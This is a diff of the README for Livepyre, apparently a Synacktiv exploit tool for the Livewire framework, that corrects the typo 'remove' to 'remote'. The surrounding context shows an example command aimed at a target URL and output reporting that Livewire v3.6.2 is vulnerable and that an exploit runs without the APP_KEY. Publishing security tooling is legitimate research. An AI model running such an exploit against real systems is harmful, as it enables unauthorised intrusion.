synacktiv/Livepyre/README.md

 # Without the APP_KEY with bruteforce if there isn't any object type in snapshot
 $ ./Livepyre.py -u http://livewire.local/counter
-[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
+[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
 [INFO] Found snapshot(s).
 Running exploit.
 [INFO] Running exploit without APP_KEY.
 [INFO] Found 1 snapshot(s) available.